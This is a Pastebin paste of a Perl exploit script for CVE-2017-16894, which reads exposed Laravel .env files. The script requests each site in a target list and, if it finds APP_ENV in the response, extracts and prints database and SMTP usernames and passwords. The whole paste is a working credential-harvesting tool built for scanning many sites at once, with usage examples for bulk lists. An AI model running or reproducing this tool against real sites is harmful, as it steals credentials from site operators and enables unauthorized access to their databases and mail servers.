Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- # [CVE - 2017-16894] - Laravel Enviroment Variables - Read passwords and login credentials
- # CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16894
- # POC: http://whiteboyz.xyz/laravel-env-file-vuln.html
- # Coder by v4p0r 20 NOV 2017
- use strict;
- use warnings;
- use Getopt::Long;
- use WWW::Mechanize;
- my ($helpzinho);
- my $banner = @ARGV;
- GetOptions( 'list-site|l=s' => \$main::list,
- 'site|s=s' => \$main::site,
- 'help|h' => \$helpzinho,
- );
- if ($helpzinho) {
- &banner;
- }
- print "================================\n" .
- " # Exploit: EAV EXPLOIT \n" .
- " # Coder: v4p0r \n" .
- " # Date: 21 NOV 2017 \n" .
- "================================\n";
- if ($main::site) {
- my $url = $main::site;
- print $url;
- my $env = request($url);
- if ($env =~ /APP_ENV/){
- get_config($env);
- exit;
- } else {
- print "[NOT VULN]";
- }
- }
- if($banner <= 1){
- print "\nCoder: v4p0r\n" .
- "Team: Yunkers Crew\n" .
- "Twitter: 0x777null\n".
- "Skype: drx.priv\n\n" .
- "Usage: perl $0 --help\n";
- exit;
- }
- open (my $web,'<',$main::list) || die "\n [Lista nao selecionada]";
- my @sites = <$web>;
- foreach my $url(@sites) {
- print "\n[SITE]: ".$url."";
- my $env = request($url);
- if ($env =~ /APP_ENV/){
- get_config($env);
- } else {
- print "[NOT VULN]";
- }
- }
- sub request {
- my $url = shift;
- $url = 'http://'.$url if $url !~/^https?:\/\//;
- my $req = WWW::Mechanize->new( agent => 'Mozilla 5.0' );
- $req->timeout(3);
- $req->max_size(1024000);
- $req->protocols_allowed( [ 'http', 'https'] );
- $req->get($url);
- my $brabo = $req->content;
- return $brabo;
- }
- sub get_config {
- my $env = shift;
- print "\n[DATABASE CONFIG]\n\n";
- my @dbc = $env =~ /DB_CONNECTION=(.*)/;
- my @dbh = $env =~ /DB_HOST=(.*)/;
- my @dbp = $env =~ /DB_PORT=(.*)/;
- my @dbd = $env =~ /DB_DATABASE=(.*)/;
- my @dbu = $env =~ /DB_USERNAME=(.*)/;
- my @dbpwd = $env =~ /DB_PASSWORD=(.*)/;
- print "[DB_CONNECTION]: " . ($dbc[0] // 'Nothing') . "\n";
- print "[DB_HOST]: " . ($dbh[0] // 'Nothing') . "\n";
- print "[DB_PORT]: " . ($dbp[0] // 'Nothing') . "\n";
- print "[DB_DATABASE]: " . ($dbd[0] // 'Nothing') . "\n";
- print "[DB_USERNAME]: " . ($dbu[0] // 'Nothing') . "\n";
- print "[DB_PASSWORD]: " . ($dbpwd[0] // 'Nothing') . "\n";
- # GET SMTP CONFIG
- print "\n[SMTP CONFIG]\n\n";
- my @md = $env =~ /MAIL_DRIVER=(.*)/;
- my @mh = $env =~ /MAIL_HOST=(.*)/;
- my @mp = $env =~ /MAIL_PORT=(.*)/;
- my @mfn = $env =~ /MAIL_FROM_NAME=(.*)/;
- my @mfe = $env =~ /MAIL_FROM_EMAIL=(.*)/;
- my @mu = $env =~ /MAIL_USERNAME=(.*)/;
- my @mpwd = $env =~ /MAIL_PASSWORD=(.*)/;
- my @me = $env =~ /MAIL_ENCRYPTION=(.*)/;
- print "[MAIL_DRIVER]: " . ($md[0] // 'Nothing') . "\n";
- print "[MAIL_HOST]: " . ($mh[0] // 'Nothing') . "\n";
- print "[MAIL_PORT]: " . ($mp[0] // 'Nothing') . "\n";
- print "[MAIL_FROM_NAME]: " . ($mfn[0] // 'Nothing') . "\n";
- print "[MAIL_FROM_EMAIL]: " . ($mfe[0] // 'Nothing') . "\n";
- print "[MAIL_USERNAME]: " . ($mu[0] // 'Nothing') . "\n";
- print "[MAIL_PASSWORD]: " . ($mpwd[0] // 'Nothing') . "\n";
- print "[MAIL_ENCRYPTION]: " . ($me[0] // 'Nothing') . "\n";
- }
- sub banner {
- print "\nUsage: $0 <comando>\n".
- "[+] Comandos:\n".
- "--help [Ajuda com os comandos]\n".
- "--list-site|l [Seleciona sua lista de sites]\n".
- "--site|s [Unico alvo]\n".
- "[!] Exemplos:\n".
- "perl $0 -l sites.txt\n".
- "perl $0 -s http://localhost/.env\n";
- exit;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement